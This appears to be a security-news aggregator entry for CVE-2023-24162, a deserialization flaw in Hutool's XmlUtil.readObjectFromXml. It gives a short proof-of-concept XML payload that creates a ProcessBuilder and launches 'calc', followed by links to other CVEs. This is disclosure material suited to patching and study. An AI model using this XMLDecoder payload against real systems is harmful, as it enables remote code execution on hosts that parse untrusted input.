Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-24162: XmlUtil Deserialization vulnerability · Issue #2855 · dromara/hutool

Deserialization vulnerability in Dromara Hutool v5.8.11 allows attacker to execute arbitrary code via the XmlUtil.readObjectFromXml parameter.

CVE
Open in Source
#vulnerability#java#rce

Desc

Hutool provides XML utility classes that may be vulnerable to remote code execution when using XmlUtil.readObjectFromXml to interpret untrusted XML strings

Detailed

The program will call XMLDecoder.readObject to parse the XML string, causing a deserialization vulnerability

cn.hutool.core.util.XmlUtil#readObjectFromXml

Attack

XmlUtil.readObjectFromXml(“<java>\n” + " <object class=\"java.lang.ProcessBuilder\">\n" + " <array class=\"java.lang.String\" length=\"1\">\n" + " <void index=\"0\">\n" + " <string>calc</string>\n" + " </void>\n" + " </array>\n" + " <void method=\"start\"></void>\n" + " </object>\n" + “</java>\n”);

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE